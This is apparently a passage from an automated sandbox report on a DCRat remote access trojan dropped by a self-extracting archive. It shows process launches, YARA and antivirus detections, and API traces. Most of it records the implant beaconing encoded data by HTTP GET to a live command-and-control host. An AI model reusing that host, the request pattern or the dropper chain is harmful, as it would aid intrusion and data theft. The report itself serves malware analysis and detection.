Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:20:38.330703974 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:20:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50017	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:20:43.340688944 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:20:44.018168926 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:20:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50018	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:20:49.028161049 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:20:49.704236031 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:20:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50019	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:20:54.717807055 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:20:55.391807079 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:20:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50020	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:21:00.403615952 CET	2230	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJN [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:21:01.080615997 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:21:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Target ID:	0
Start time:	23:16:53
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\5Ixz5yVfS7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\5Ixz5yVfS7.exe"
Imagebase:	0x590000
File size:	1'164'920 bytes
MD5 hash:	7B4ECCF10CC4FA7263646F2FCE4D7F8B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:16:54
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe"
Imagebase:	0x460000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:17:00
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	23:17:00
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	23:17:00
Start date:	01/01/2025
Path:	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe"
Imagebase:	0x850000
File size:	847'872 bytes
MD5 hash:	21879480EBF05FF55A58FC933CB818A4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.0000000002F3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.3%
Total number of Nodes:	1517
Total number of Limit Nodes:	35

Executed Functions

Function 005AD5D4 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005A00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 005A00E4
Part of subcall function 005A00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 005A00F6
Part of subcall function 005A00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005A0127

Part of subcall function 005A9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 005A9DAC

Part of subcall function 005AA335: OleInitialize.OLE32(00000000), ref: 005AA34E
Part of subcall function 005AA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 005AA385
Part of subcall function 005AA335: SHGetMalloc.SHELL32(005D8430), ref: 005AA38F

Part of subcall function 005A13B3: GetCPInfo.KERNEL32(00000000,?), ref: 005A13C4
Part of subcall function 005A13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 005A13D8

GetCommandLineW.KERNEL32 ref: 005AD61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 005AD643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 005AD654
UnmapViewOfFile.KERNEL32(00000000), ref: 005AD68E

Part of subcall function 005AD287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 005AD29D
Part of subcall function 005AD287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 005AD2D9

CloseHandle.KERNEL32(00000000), ref: 005AD697
GetModuleFileNameW.KERNEL32(00000000,005EDC90,00000800), ref: 005AD6B2
SetEnvironmentVariableW.KERNEL32(sfxname,005EDC90), ref: 005AD6BE
GetLocalTime.KERNEL32(?), ref: 005AD6C9
_swprintf.LIBCMT ref: 005AD708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 005AD71A
GetModuleHandleW.KERNEL32(00000000), ref: 005AD721
LoadIconW.USER32(00000000,00000064), ref: 005AD738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 005AD789
Sleep.KERNEL32(?), ref: 005AD7B7
DeleteObject.GDI32 ref: 005AD7F0
DeleteObject.GDI32(?), ref: 005AD800
CloseHandle.KERNEL32 ref: 005AD843

Strings

sfxstime, xrefs: 005AD715
sfxname, xrefs: 005AD6B9
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 005AD6F9
winrarsfxmappingfile.tmp, xrefs: 005AD637
C:\Users\user\Desktop, xrefs: 005AD5E9
xj^, xrefs: 005AD7CB
STARTDLG, xrefs: 005AD77E

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xj^
API String ID: 788466649-1924929721
Opcode ID: 9a0022fe6d0383eaf2331d3106dffec32915b9914a62f000aa4e548cd30d104c
Instruction ID: 01e7a11869d9dbe417cfb47c841bdb52a542f2ad63eb742cfa57bb9535a6bbf7
Opcode Fuzzy Hash: 9a0022fe6d0383eaf2331d3106dffec32915b9914a62f000aa4e548cd30d104c
Instruction Fuzzy Hash: 6F61A371900242AFD720ABA5EC4DF2E3FBCFB66744F04042AF54696291DB789908D772

Function 005A9E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(005AAE4D,PNG,?,?,?,005AAE4D,00000066), ref: 005A9E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,005AAE4D,00000066), ref: 005A9E46
LoadResource.KERNEL32(00000000,?,?,?,005AAE4D,00000066), ref: 005A9E59
LockResource.KERNEL32(00000000,?,?,?,005AAE4D,00000066), ref: 005A9E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,005AAE4D,00000066), ref: 005A9E82
GlobalLock.KERNEL32(00000000), ref: 005A9E93
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 005A9EB7
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 005A9EFC
GlobalUnlock.KERNEL32(00000000), ref: 005A9F1B
GlobalFree.KERNEL32(00000000), ref: 005A9F22

Strings

PNG, xrefs: 005A9E1F

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
String ID: PNG
API String ID: 3656887471-364855578
Opcode ID: 6b6a4c302fd7ec5c0dc97abdeb15580681fbf37fbaa6b758c89d442c25ba837f
Instruction ID: b4674f6569d520bf5bc62a9eb173874164e8bfbf1f4cbf1765d655cafb4dbf47
Opcode Fuzzy Hash: 6b6a4c302fd7ec5c0dc97abdeb15580681fbf37fbaa6b758c89d442c25ba837f
Instruction Fuzzy Hash: 7F31B175204716AFC7119F21DC48E2FBFADFF9A751B044529F902D2260EB32DC04DAA0

Function 0059A5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0059A4EF,000000FF,?,?), ref: 0059A628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0059A4EF,000000FF,?,?), ref: 0059A65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0059A4EF,000000FF,?,?), ref: 0059A66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,0059A4EF,000000FF,?,?), ref: 0059A692
GetLastError.KERNEL32(?,?,?,?,0059A4EF,000000FF,?,?), ref: 0059A69E

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: dbe8335c8a3624d3c9ec33e0e71b492c3f8145d30a4a4a532cfbd2206265357f
Instruction ID: 7b996bf0c4892299266cf84336c6b27de31d2763115dc3e452bf78fd9ef19e8a
Opcode Fuzzy Hash: dbe8335c8a3624d3c9ec33e0e71b492c3f8145d30a4a4a532cfbd2206265357f
Instruction Fuzzy Hash: 03417672504646AFC724EF68C884ADEFBFCBF99340F044929F599D3240D734A9549BA2

Function 005B753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,005B7513,00000000,005CBAD8,0000000C,005B766A,00000000,00000002,00000000), ref: 005B755E
TerminateProcess.KERNEL32(00000000,?,005B7513,00000000,005CBAD8,0000000C,005B766A,00000000,00000002,00000000), ref: 005B7565
ExitProcess.KERNEL32 ref: 005B7577

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 32b187c1a67d218f4be992bc705fe445d3d892ad4abd60f13dae621c1b3cc8b0
Instruction ID: 5b94c620886b4dd0ac4087b628e2e9c93a58759f7b87203c0e767ef848913f7e
Opcode Fuzzy Hash: 32b187c1a67d218f4be992bc705fe445d3d892ad4abd60f13dae621c1b3cc8b0
Instruction Fuzzy Hash: BFE0B632004A4CAFCF21AF68DD0DE893F69FB94741F108414F9459A272DB35EE46DB94

Function 0059857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00598580
